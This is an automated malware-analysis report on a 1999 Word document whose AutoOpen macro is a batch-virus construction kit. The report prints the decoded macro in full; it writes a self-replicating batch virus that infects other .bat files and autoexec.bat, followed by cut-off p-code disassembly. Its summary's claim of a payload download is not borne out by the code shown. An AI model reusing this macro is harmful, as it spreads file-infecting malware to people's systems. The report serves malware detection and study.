Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0515fdc838f4e6f0…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 35.0 KB
Created: 1999-04-12 20:06:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 0a11e409631b7c829057bdfe916bc9ac
SHA-1: f0408ca24a0c610eaa651c6f1157620efb4f3d4e
SHA-256: 0515fdc838f4e6f09e28c2f676dd560711057e33631f309ca93b94968ed336b5
Risk Score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is a legacy Word document containing a WordBasic macro that executes automatically when the document is opened (AutoOpen). The macro displays a dialog box prompting the user for a virus name, an author string and an output path, and writes a batch file (default name 'c:\boot.bat') built from that input. This indicates a likely intent to download and execute a secondary payload or establish persistence.

Heuristics (4)

  • ClamAV: Win.Tool.Macro-18 (severity: critical, id: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Tool.Macro-18
  • VBA macros detected (severity: medium, 1 related finding, id: OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high, id: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (severity: medium, id: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface; by itself it does not attribute the sample to a downloader or to a parser CVE.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9290 bytes
SHA-256: 46d4eea5134c81f520ad67398a73905d05428b5190db1cbe58455dbb8d063a52
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"

Public Sub MAIN()
WordBasic.MsgBox "Mafia's Shit Creation Center v1.0b" + Chr(13) + _
"                   " + Chr(13) + _
"       (c) by XaRaBaS [DkpRJ]", "MSCC v1.0b"
WordBasic.BeginDialog 400, 150, "MSCC v1.0b   (c) XaRaBaS [DkpRJ]"
WordBasic.Text 10, 10, 300, 20, "Enter virus info and click OK"
WordBasic.Text 10, 40, 100, 50, "NaMe oF ThiS ShiT:"
WordBasic.TextBox 120, 40, 120, 17, "Ident$"
WordBasic.Text 10, 70, 100, 50, "Author:"
WordBasic.TextBox 120, 70, 120, 17, "Author$"
WordBasic.Text 10, 100, 100, 50, "TyPe HeRe ThE PaTh AnD ThE NaME Of ThE ViRuS:"
WordBasic.TextBox 120, 100, 240, 17, "Name$"
WordBasic.OKButton 270, 40, 90, 20
WordBasic.CancelButton 270, 70, 90, 20
WordBasic.EndDialog
Dim dlg As Object: Set dlg = WordBasic.CurValues.UserDialog
dlg.Ident$ = "[DkpRJ]"
dlg.Author$ = "XaRaBaS 1999 [DkpRJ]"
dlg.Name$ = "c:\boot.bat"
On Error GoTo -1: On Error GoTo Clo
WordBasic.Dialog.UserDialog dlg
WordBasic.FileNew
WordBasic.Insert "@echo off %" + dlg.Ident$ + "%" + Chr(13) + Chr(10)
WordBasic.Insert "if -%1==-@ goto " + dlg.Ident$ + "z" + Chr(13) + Chr(10)
WordBasic.Insert "echo.>" + dlg.Ident$ + ".bat" + Chr(13) + Chr(10)
WordBasic.Insert "find " + Chr(34) + dlg.Ident$ + Chr(34) + _
"<%0>>" + dlg.Ident$ + ".bat" + Chr(13) + Chr(10)
WordBasic.Insert "for %%b in (*.bat) do call " + _
dlg.Ident$ + ".bat @ %%b" + Chr(13) + Chr(10)
WordBasic.Insert "del " + dlg.Ident$ + ".bat" + Chr(13) + Chr(10)
WordBasic.Insert "goto " + dlg.Ident$ + Chr(13) + Chr(10)
WordBasic.Insert ":" + dlg.Ident$ + "z [SBVM 0.02d]" + Chr(13) + Chr(10)
WordBasic.Insert "if -%2==-autoexec.bat goto " + dlg.Ident$ + _
Chr(13) + Chr(10)
WordBasic.Insert "find " + Chr(34) + dlg.Ident$ + Chr(34) + _
"<%2>nul" + Chr(13) + Chr(10)
WordBasic.Insert "if errorlevel 1 type " + dlg.Ident$ + _
".bat>>%2" + Chr(13) + Chr(10)
WordBasic.Insert ":" + dlg.Ident$ + " by " + dlg.Author$
WordBasic.FileSaveAs Name:=dlg.Name$, Format:=4
WordBasic.FileClose (2)
WordBasic.MsgBox "A NeW ViRuS WaS CreAtED!!" + Chr(13) + _
"ThAnKs FoR UsInG MaFiA's ShIt CoStRuCtIon KiT", "MSCC v1.0b"
Clo:
End Sub


' Processing file: /opt/analyzer/scan_staging/889ab833b59d48ff80c962cf2f6f2492.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/AutoOpen - 4323 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Public Sub MAIN())
' Line #2:
' 	LineCont 0x0008 0A 00 00 00 11 00 00 00
' 	LitStr 0x0022 "Mafia's Shit Creation Center v1.0b"
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	LitStr 0x0013 "                   "
' 	Add 
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	LitStr 0x001D "       (c) by XaRaBaS [DkpRJ]"
' 	Add 
' 	LitStr 0x000A "MSCC v1.0b"
' 	Ld WordBasic 
' 	ArgsMemCall MsgBox 0x0002 
' Line #3:
' 	LitDI2 0x0190 
' 	LitDI2 0x0096 
' 	LitStr 0x0020 "MSCC v1.0b   (c) XaRaBaS [DkpRJ]"
' 	Ld WordBasic 
' 	ArgsMemCall BeginDialog 0x0003 
' Line #4:
' 	LitDI2 0x000A 
' 	LitDI2 0x000A 
' 	LitDI2 0x012C 
' 	LitDI2 0x0014 
' 	LitStr 0x001D "Enter virus info and click OK"
' 	Ld WordBasic 
' 	ArgsMemCall Then 0x0005 
' Line #5:
' 	LitDI2 0x000A 
' 	LitDI2 0x0028 
' 	LitDI2 0x0064 
' 	LitDI2 0x0032 
' 	LitStr 0x0012 "NaMe oF ThiS ShiT:"
' 	Ld WordBasic 
' 	ArgsMemCall Then 0x0005 
' Line #6:
' 	LitDI2 0x0078 
' 	LitDI2 0x0028 
' 	LitDI2 0x0078 
' 	LitDI2 0x0011 
' 	LitStr 0x0006 "Ident$"
' 	Ld WordBasic 
' 	ArgsMemCall TextBox 0x0005 
' Line #7:
' 	LitDI2 0x000A 
' 	LitDI2 0x0046 
' 	LitDI2 0x0064 
' 	LitDI2 0x0032 
' 	LitStr 0x0007 "Author:"
' 	Ld WordBasic 
' 	ArgsMemCall Then 0x0005 
' Line #8:
' 	LitDI2 0x0078 
' 	LitDI2 0x0046 
' 	LitDI2 0x0078 
' 	LitDI2 0x0011 
' 	LitStr 0x0007 "Author$"
' 	Ld WordBasic 
' 	ArgsMemCall TextBox 0x0005 
' Lin
... (truncated)